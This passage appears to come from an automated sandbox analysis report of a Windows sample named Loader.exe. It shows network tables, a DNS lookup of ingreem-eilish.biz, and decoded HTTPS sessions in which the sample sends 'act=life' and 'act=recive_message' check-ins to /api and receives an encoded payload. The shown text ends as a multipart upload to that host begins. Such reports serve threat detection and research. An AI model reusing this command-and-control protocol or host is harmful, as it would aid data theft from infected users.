Dec 20, 2024 17:41:50.822948933 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:50.822979927 CET | 443 | 49773 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:50.823050976 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:50.867335081 CET | 443 | 49773 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:51.622442007 CET | 443 | 49773 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:51.622714043 CET | 443 | 49773 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:51.622761011 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:51.622781038 CET | 49773 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:52.185323954 CET | 49780 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:52.185370922 CET | 443 | 49780 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:52.185477972 CET | 49780 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:52.185898066 CET | 49780 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:52.185914040 CET | 443 | 49780 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:53.431325912 CET | 443 | 49780 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:53.431410074 CET | 49780 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:53.433197975 CET | 49780 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:53.433207035 CET | 443 | 49780 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:53.433557987 CET | 443 | 49780 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:53.434983969 CET | 49780 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:53.435127020 CET | 49780 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:53.435173988 CET | 443 | 49780 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:53.435247898 CET | 49780 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:53.435256004 CET | 443 | 49780 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:54.335671902 CET | 443 | 49780 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:54.335958004 CET | 49780 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:54.680305004 CET | 49786 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:54.680349112 CET | 443 | 49786 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:54.680501938 CET | 49786 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:54.680773020 CET | 49786 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:54.680788994 CET | 443 | 49786 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:55.900676966 CET | 443 | 49786 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:55.900794983 CET | 49786 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:55.902383089 CET | 49786 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:55.902389050 CET | 443 | 49786 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:55.902620077 CET | 443 | 49786 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:55.905221939 CET | 49786 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:55.905559063 CET | 49786 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:55.905565023 CET | 443 | 49786 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:56.569977999 CET | 443 | 49786 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:56.570116043 CET | 443 | 49786 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:56.570194006 CET | 49786 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:56.570244074 CET | 49786 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:56.570265055 CET | 443 | 49786 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:56.627342939 CET | 49792 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:56.627383947 CET | 443 | 49792 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:56.627485037 CET | 49792 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:56.627810001 CET | 49792 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:56.627825022 CET | 443 | 49792 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:57.870930910 CET | 443 | 49792 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:57.871063948 CET | 49792 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:57.872438908 CET | 49792 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:57.872457981 CET | 443 | 49792 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:57.872795105 CET | 443 | 49792 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:57.874484062 CET | 49792 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:57.874568939 CET | 49792 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:57.874576092 CET | 443 | 49792 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:59.567353010 CET | 443 | 49792 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:59.567595959 CET | 443 | 49792 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:59.567646980 CET | 49792 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:59.567646980 CET | 49792 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:59.604072094 CET | 49799 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:59.604116917 CET | 443 | 49799 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:41:59.604217052 CET | 49799 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:59.604541063 CET | 49799 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:41:59.604557991 CET | 443 | 49799 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:42:00.820846081 CET | 443 | 49799 | 104.21.90.135 | 192.168.2.5
Dec 20, 2024 17:42:00.820992947 CET | 49799 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:42:00.822267056 CET | 49799 | 443 | 192.168.2.5 | 104.21.90.135
Dec 20, 2024 17:42:00.822288990 CET | 443 | 49799 | 104.21.90.135 | 192.168.2.5
                                                                                      Dec 20, 2024 17:42:00.822540998 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:00.823904991 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:00.823957920 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:00.823983908 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:01.648260117 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:01.648350954 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:01.648612976 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:01.648736954 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:01.648761034 CET44349799104.21.90.135192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 17:41:42.751671076 CET | 53801 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 17:41:43.083385944 CET | 53 | 53801 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 17:41:42.751671076 CET | 192.168.2.5 | 1.1.1.1 | 0xe620 | Standard query (0) | ingreem-eilish.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 17:41:43.083385944 CET | 1.1.1.1 | 192.168.2.5 | 0xe620 | No error (0) | ingreem-eilish.biz | | 104.21.90.135 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:41:43.083385944 CET | 1.1.1.1 | 192.168.2.5 | 0xe620 | No error (0) | ingreem-eilish.biz | | 172.67.200.171 | A (IP address) | IN (0x0001) | false
• ingreem-eilish.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49756 | 104.21.90.135 | 443 | 6448 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:41:44 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: ingreem-eilish.biz
2024-12-20 16:41:44 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-20 16:41:45 UTC | 1037 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:41:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jjg1tfo5mql4c02p6epc0aa8dj; expires=Tue, 15-Apr-2025 10:28:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOklVe82h95%2FPNyB4bGLRU8wxmdHkI1L92oTFE4L0Yeqk0GuMMq3nml2hn2sUw%2Fb1S0RmDkxTWKkrmIgrk3dDHLaWgKZHbkhTxLfpTNMCGY7xAfzCFBnJRXAYKtZDLivRbsLrE8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f5114e61eed0fa7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2912&min_rtt=1665&rtt_var=1515&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1753753&cwnd=220&unsent_bytes=0&cid=89cf866507c89cdc&ts=736&x=0"
2024-12-20 16:41:45 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-20 16:41:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49761 | 104.21.90.135 | 443 | 6448 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:41:46 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 86
Host: ingreem-eilish.biz
2024-12-20 16:41:46 UTC | 86 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--b58c2f805636&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-12-20 16:41:47 UTC | 1040 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:41:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=r44rrqv1c07gbim6gakjd1td0c; expires=Tue, 15-Apr-2025 10:28:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WejyeJT4ZB0w7ZBsilkIOHSMaLLT%2F57iNTErB5GsNg4tQNW%2B9JI6Ps537O4VhWsmIM86KArOKka4XrnzSsg34H34mmMFLrkfqc9vv6SisAjjk%2B43jojHVuAS4B%2B1W9vbp9smmUM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f5114f29f1e0fa7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1645&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=988&delivery_rate=1752701&cwnd=220&unsent_bytes=0&cid=7cb820543e6a7c96&ts=724&x=0"
2024-12-20 16:41:47 UTC | 329 | IN | Data Raw: 34 33 30 63 0d 0a 46 34 51 50 6a 52 4c 70 7a 4f 77 54 71 4f 46 30 42 58 78 6e 6f 5a 6a 54 65 48 51 51 59 6b 48 65 35 74 4e 64 41 4f 7a 37 68 54 39 73 70 6e 6d 76 4b 4e 33 67 7a 6d 44 4e 77 30 35 6a 48 51 76 53 2f 66 39 61 46 58 52 41 65 37 69 48 76 79 35 6c 77 4e 6e 7a 55 6a 57 2b 61 65 78 2b 6d 71 6e 41 4d 63 32 5a 56 6a 38 6e 48 49 50 39 76 56 70 4f 4d 67 63 72 76 49 65 2f 50 32 47 48 6c 50 56 54 64 4f 78 6a 36 6e 71 4d 72 34 68 79 78 49 77 52 59 42 6b 47 79 2f 61 36 46 52 78 39 51 47 33 38 67 36 6c 2f 4f 73 36 32 34 45 74 32 79 57 37 2b 65 63 75 78 77 47 69 4b 68 42 6f 6e 52 6b 58 41 2f 62 45 55 45 6e 51 4a 4b 62 61 4f 74 7a 35 6b 68 6f 76 73 57 58 2f 73 62 65 6c 37 68 71 61 63 66 38 36 4c 47 6d 59 54 42 6f 4f 30 38 52 30 4f 4d 6c 68 6a 37 37 61 79 4c
Data Ascii: 430cF4QPjRLpzOwTqOF0BXxnoZjTeHQQYkHe5tNdAOz7hT9spnmvKN3gzmDNw05jHQvS/f9aFXRAe7iHvy5lwNnzUjW+aex+mqnAMc2ZVj8nHIP9vVpOMgcrvIe/P2GHlPVTdOxj6nqMr4hyxIwRYBkGy/a6FRx9QG38g6l/Os624Et2yW7+ecuxwGiKhBonRkXA/bEUEnQJKbaOtz5khovsWX/sbel7hqacf86LGmYTBoO08R0OMlhj77ayL
2024-12-20 16:41:47 UTC | 1369 | IN | Data Raw: 36 42 6e 45 44 4e 37 47 56 38 53 41 73 6c 39 6e 67 55 54 57 2b 4c 65 6c 2b 69 71 4f 4f 59 38 4b 49 48 57 49 4d 44 73 72 33 76 42 6f 62 65 41 38 67 76 49 4f 37 4e 57 32 45 6e 65 70 51 63 2b 5a 74 72 7a 37 4c 71 5a 59 78 6b 73 4d 31 59 67 34 43 7a 2b 7a 7a 49 46 5a 74 54 6a 72 38 67 37 31 2f 4f 73 36 52 34 6c 35 32 37 57 4c 73 65 49 43 38 6a 6d 50 4d 6a 68 4e 31 47 41 44 4e 38 4c 49 49 48 48 77 47 49 4c 57 50 75 44 70 6c 69 74 6d 70 48 58 4c 2b 4c 62 63 77 71 71 4f 46 66 63 43 55 46 69 63 42 53 39 71 36 74 68 5a 57 4b 6b 41 6e 76 59 43 77 4f 32 79 41 6e 65 74 62 65 2b 74 69 36 58 71 4c 71 59 52 35 77 6f 49 62 62 42 45 46 78 76 65 31 48 42 70 7a 42 57 50 79 78 4c 59 6e 49 74 62 5a 79 56 70 32 39 43 2f 61 63 34 57 67 69 57 65 4b 6e 46 68 2b 58 67 4c 50 75 75
Data Ascii: 6BnEDN7GV8SAsl9ngUTW+Lel+iqOOY8KIHWIMDsr3vBobeA8gvIO7NW2EnepQc+Ztrz7LqZYxksM1Yg4Cz+zzIFZtTjr8g71/Os6R4l527WLseIC8jmPMjhN1GADN8LIIHHwGILWPuDplitmpHXL+LbcwqqOFfcCUFicBS9q6thZWKkAnvYCwO2yAnetbe+ti6XqLqYR5woIbbBEFxve1HBpzBWPyxLYnItbZyVp29C/ac4WgiWeKnFh+XgLPuu
2024-12-20 16:41:47 UTC | 1369 | IN | Data Raw: 51 47 33 38 67 36 6c 2f 4f 73 36 74 34 46 46 34 36 53 2f 61 63 34 57 67 69 57 65 4b 6e 46 68 2b 58 67 4c 50 75 75 6c 61 47 6e 73 41 4b 4c 61 41 73 54 68 76 69 35 72 67 58 6e 6a 68 5a 2b 46 33 6a 36 4b 48 66 4d 79 44 45 57 4d 62 46 38 62 7a 76 52 5a 57 50 45 41 6b 70 4d 54 70 66 30 32 4a 6a 2b 52 79 64 76 64 6b 72 32 2f 46 74 38 35 32 78 73 4e 4f 4a 78 6b 41 79 2f 47 33 45 68 5a 67 42 53 32 33 68 62 73 35 59 34 4f 56 34 56 31 30 35 6d 76 6a 63 49 79 70 6e 47 50 50 68 51 52 74 58 6b 75 44 2f 61 6c 61 54 6a 49 32 4d 36 75 56 70 33 31 58 6a 5a 66 70 57 6d 4f 6d 63 71 46 70 79 36 6d 43 4d 5a 4c 44 48 57 63 53 41 73 76 38 74 52 49 5a 66 51 6b 78 76 59 69 2f 4c 57 57 4f 6b 4f 6c 53 65 65 39 67 36 48 32 41 70 49 4e 31 7a 59 4a 57 4b 56 34 43 32 37 72 70 57 69 42
Data Ascii: QG38g6l/Os6t4FF46S/ac4WgiWeKnFh+XgLPuulaGnsAKLaAsThvi5rgXnjhZ+F3j6KHfMyDEWMbF8bzvRZWPEAkpMTpf02Jj+Rydvdkr2/Ft852xsNOJxkAy/G3EhZgBS23hbs5Y4OV4V105mvjcIypnGPPhQRtXkuD/alaTjI2M6uVp31XjZfpWmOmcqFpy6mCMZLDHWcSAsv8tRIZfQkxvYi/LWWOkOlSee9g6H2ApIN1zYJWKV4C27rpWiB
2024-12-20 16:41:47 UTC | 1369 | IN | Data Raw: 49 2b 35 50 6d 36 41 6e 75 4a 55 66 65 35 2f 37 6e 53 44 72 34 42 2b 79 34 63 54 59 68 6f 43 78 2f 79 2b 57 6c 67 79 42 7a 76 38 33 50 45 51 52 62 76 62 78 6d 63 31 2b 53 50 32 4d 49 79 69 7a 69 6d 4b 6a 78 56 72 46 67 72 46 38 37 30 51 48 33 6b 4d 4b 4c 69 49 75 44 70 6b 6a 35 7a 69 58 48 48 71 5a 2b 6c 7a 69 4b 47 42 66 73 4c 44 57 43 63 5a 48 59 4f 69 38 54 38 42 65 51 34 6c 2f 4a 76 2f 4a 69 4b 4a 6c 61 63 46 4e 65 70 6b 36 58 61 4f 6f 6f 39 33 77 6f 59 65 59 78 38 44 78 66 6d 2b 48 68 4e 7a 44 79 65 77 69 72 73 2b 59 34 4b 53 36 46 5a 77 70 69 4f 76 64 35 50 75 31 6a 48 37 67 41 42 77 44 67 6d 44 35 66 38 44 56 6e 55 4d 59 2b 54 45 73 43 31 6f 68 4a 66 69 55 6e 44 6c 59 75 68 39 6a 61 4b 45 65 4d 4b 46 47 57 34 4d 42 73 2f 30 74 68 51 61 66 41 30 70
Data Ascii: I+5Pm6AnuJUfe5/7nSDr4B+y4cTYhoCx/y+WlgyBzv83PEQRbvbxmc1+SP2MIyizimKjxVrFgrF870QH3kMKLiIuDpkj5ziXHHqZ+lziKGBfsLDWCcZHYOi8T8BeQ4l/Jv/JiKJlacFNepk6XaOoo93woYeYx8Dxfm+HhNzDyewirs+Y4KS6FZwpiOvd5Pu1jH7gABwDgmD5f8DVnUMY+TEsC1ohJfiUnDlYuh9jaKEeMKFGW4MBs/0thQafA0p
2024-12-20 16:41:47 UTC | 1369 | IN | Data Raw: 5a 70 6e 4a 50 67 57 6e 37 75 5a 75 42 32 6d 61 4b 41 59 38 2b 52 42 43 64 51 52 63 54 69 38 55 4a 57 52 41 63 7a 72 49 66 7a 44 6e 53 4e 6a 2b 78 51 65 61 5a 79 6f 57 6e 4c 71 59 49 78 6b 73 4d 51 61 42 63 47 7a 50 75 34 46 68 74 33 43 53 61 39 67 72 55 31 61 49 36 66 34 56 78 77 37 47 37 75 65 6f 4b 70 68 6e 62 4a 6b 56 59 70 58 67 4c 62 75 75 6c 61 50 33 55 53 4c 61 7a 45 72 6e 46 37 7a 70 37 72 48 53 32 6d 61 65 56 2f 6a 36 6d 43 64 38 2b 46 47 32 59 52 42 4d 50 31 74 52 45 66 64 41 45 75 75 59 6d 31 4c 57 69 46 6c 75 74 55 65 65 73 74 6f 54 43 4d 74 73 34 70 69 72 49 62 61 52 41 43 31 62 71 75 56 41 38 79 42 79 2f 38 33 50 45 2b 62 6f 47 61 36 46 35 32 35 32 66 39 59 6f 65 6e 68 6e 54 47 69 42 68 68 44 41 50 4d 38 37 49 5a 48 33 55 49 4c 37 61 48 74
Data Ascii: ZpnJPgWn7uZuB2maKAY8+RBCdQRcTi8UJWRAczrIfzDnSNj+xQeaZyoWnLqYIxksMQaBcGzPu4Fht3CSa9grU1aI6f4Vxw7G7ueoKphnbJkVYpXgLbuulaP3USLazErnF7zp7rHS2maeV/j6mCd8+FG2YRBMP1tREfdAEuuYm1LWiFlutUeestoTCMts4pirIbaRAC1bquVA8yBy/83PE+boGa6F5252f9YoenhnTGiBhhDAPM87IZH3UIL7aHt
2024-12-20 16:41:47 UTC | 1369 | IN | Data Raw: 42 38 55 31 69 34 58 4b 68 61 63 75 70 67 6a 47 53 77 78 42 75 47 41 4c 46 39 4b 4d 66 45 48 30 50 4b 72 57 41 75 54 78 69 69 70 33 67 57 48 62 71 5a 75 68 7a 68 4b 71 48 66 38 4f 4d 56 69 6c 65 41 74 75 36 36 56 6f 33 61 51 4d 76 73 63 53 75 63 58 76 4f 6e 75 73 64 4c 61 5a 68 34 58 57 4c 70 49 68 31 7a 34 55 63 59 68 34 4f 77 50 57 31 48 42 4a 39 41 43 69 31 68 62 63 36 61 49 57 66 36 6c 35 7a 34 43 32 68 4d 49 79 32 7a 69 6d 4b 6f 77 31 71 45 67 4b 44 35 66 38 44 56 6e 55 4d 59 2b 54 45 75 6a 4e 6d 69 5a 6e 71 58 6e 33 6a 61 65 56 31 69 36 61 63 65 63 71 45 42 48 55 65 44 4d 62 32 73 68 6f 53 64 41 6b 6c 76 34 44 78 63 53 4b 4a 67 61 63 46 4e 63 74 68 36 46 6d 4d 74 63 35 75 68 4a 70 57 59 42 4a 46 6d 37 71 77 45 52 78 39 44 53 43 36 68 37 6f 36 61 49
Data Ascii: B8U1i4XKhacupgjGSwxBuGALF9KMfEH0PKrWAuTxiip3gWHbqZuhzhKqHf8OMVileAtu66Vo3aQMvscSucXvOnusdLaZh4XWLpIh1z4UcYh4OwPW1HBJ9ACi1hbc6aIWf6l5z4C2hMIy2zimKow1qEgKD5f8DVnUMY+TEujNmiZnqXn3jaeV1i6acecqEBHUeDMb2shoSdAklv4DxcSKJgacFNcth6FmMtc5uhJpWYBJFm7qwERx9DSC6h7o6aI
2024-12-20 16:41:47 UTC | 1369 | IN | Data Raw: 4e 66 51 74 74 7a 44 4d 72 5a 78 6a 7a 49 41 41 5a 46 6b 37 2f 64 32 72 46 78 42 6c 45 52 32 43 67 36 73 79 5a 4a 6d 49 71 30 68 32 36 47 50 6f 5a 73 76 67 7a 6e 36 4b 32 79 38 6e 56 6b 58 38 74 50 45 43 56 69 70 41 46 72 2b 4b 76 7a 68 30 6e 39 54 41 52 33 6a 67 65 76 34 77 78 65 36 49 4d 5a 4c 54 57 43 63 61 46 49 4f 69 34 55 68 4e 4a 31 4e 30 37 4e 61 75 63 58 76 4f 6a 36 63 46 4a 36 67 74 2f 54 44 54 37 73 6c 79 32 4a 45 51 5a 41 67 47 68 4d 53 50 4e 42 46 30 42 53 53 73 78 70 38 30 64 6f 6e 5a 71 52 31 36 70 6a 58 57 4d 4d 50 75 73 54 2b 4b 6d 31 59 2f 58 6a 44 41 39 4c 38 64 41 47 4e 4e 44 62 75 43 74 44 68 79 7a 4c 66 73 53 58 4b 6d 49 36 39 32 79 2f 62 65 50 34 71 48 42 79 64 47 56 5a 47 68 35 45 6c 42 49 6c 49 38 38 70 33 78 4b 53 4c 57 79 36 6b
Data Ascii: NfQttzDMrZxjzIAAZFk7/d2rFxBlER2Cg6syZJmIq0h26GPoZsvgzn6K2y8nVkX8tPECVipAFr+Kvzh0n9TAR3jgev4wxe6IMZLTWCcaFIOi4UhNJ1N07NaucXvOj6cFJ6gt/TDT7sly2JEQZAgGhMSPNBF0BSSsxp80donZqR16pjXWMMPusT+Km1Y/XjDA9L8dAGNNDbuCtDhyzLfsSXKmI692y/beP4qHBydGVZGh5ElBIlI88p3xKSLWy6k
2024-12-20 16:41:47 UTC | 1369 | IN | Data Raw: 75 46 2b 6a 4c 69 66 4d 59 54 44 47 53 64 47 50 49 4f 79 38 53 56 59 4d 68 68 6a 35 4d 53 45 50 47 79 41 6e 76 46 4d 4f 4d 46 6a 36 48 47 64 76 70 6c 2b 68 61 30 67 52 6c 35 4c 67 2f 7a 78 51 6b 51 38 51 43 65 74 78 4f 6c 76 4d 4e 58 4d 74 41 6f 6c 74 48 4b 68 61 63 75 34 7a 69 6d 59 7a 56 5a 31 58 6c 32 44 76 62 49 49 42 48 51 44 4e 62 2f 44 6a 77 46 46 67 4a 37 6d 53 32 58 72 59 63 35 7a 6d 71 53 77 54 39 2b 41 47 47 6b 5a 45 39 4b 36 2f 31 6f 5a 4d 6c 67 61 2f 4d 7a 78 41 43 7a 4f 67 61 63 46 4e 64 4e 75 34 58 36 4d 75 4a 38 38 37 59 30 52 5a 67 67 56 7a 76 61 51 47 51 64 34 51 47 33 38 67 76 46 6e 4d 4d 44 5a 34 30 77 31 76 6a 32 39 4b 39 37 39 32 53 47 59 6e 46 68 2b 58 68 4f 44 6f 75 4e 55 56 6d 42 41 65 2f 7a 44 73 69 31 77 69 4a 72 78 58 6a 4c 59
Data Ascii: uF+jLifMYTDGSdGPIOy8SVYMhhj5MSEPGyAnvFMOMFj6HGdvpl+ha0gRl5Lg/zxQkQ8QCetxOlvMNXMtAoltHKhacu4zimYzVZ1Xl2DvbIIBHQDNb/DjwFFgJ7mS2XrYc5zmqSwT9+AGGkZE9K6/1oZMlga/MzxACzOgacFNdNu4X6MuJ887Y0RZggVzvaQGQd4QG38gvFnMMDZ40w1vj29K9792SGYnFh+XhODouNUVmBAe/zDsi1wiJrxXjLY
2024-12-20 16:41:47 UTC | 1369 | IN | Data Raw: 6d 38 69 48 4c 63 67 46 46 5a 49 43 6a 52 2f 61 45 5a 56 45 4d 4e 4a 36 71 52 73 69 39 6c 73 4b 66 4b 54 33 4c 32 62 71 31 56 73 65 79 2f 5a 38 6d 44 47 47 42 65 53 34 50 69 38 55 4a 57 58 78 49 6b 72 49 66 7a 47 6c 6a 4d 71 50 46 65 64 65 68 71 72 7a 37 4c 6f 73 34 70 69 6f 34 45 59 41 34 47 6a 2f 32 72 48 56 5a 74 54 6a 72 38 6b 76 46 6e 4d 63 44 5a 39 52 30 74 70 69 72 68 66 59 71 74 67 48 4c 59 6b 52 42 6b 43 41 61 45 78 49 38 31 48 58 4d 51 4c 71 32 4a 74 53 6c 63 73 4c 37 68 57 48 4c 59 55 39 68 68 6a 4c 37 4d 56 38 6d 56 46 53 64 51 52 64 75 36 36 56 6f 78 64 41 55 6b 2f 4d 72 78 4f 79 4c 57 32 63 68 57 64 50 5a 67 2f 6e 32 50 75 4d 78 57 7a 49 59 52 4a 31 42 46 7a 37 72 70 57 68 6c 6a 42 79 57 35 67 2f 30 34 65 49 6e 5a 71 52 31 37 70 6a 57 76 66
Data Ascii: m8iHLcgFFZICjR/aEZVEMNJ6qRsi9lsKfKT3L2bq1Vsey/Z8mDGGBeS4Pi8UJWXxIkrIfzGljMqPFedehqrz7Los4pio4EYA4Gj/2rHVZtTjr8kvFnMcDZ9R0tpirhfYqtgHLYkRBkCAaExI81HXMQLq2JtSlcsL7hWHLYU9hhjL7MV8mVFSdQRdu66VoxdAUk/MrxOyLW2chWdPZg/n2PuMxWzIYRJ1BFz7rpWhljByW5g/04eInZqR17pjWvf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49767 | 104.21.90.135 | 443 | 6448 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:41:48 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=O9SCPS6TVHZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12800
Host: ingreem-eilish.biz
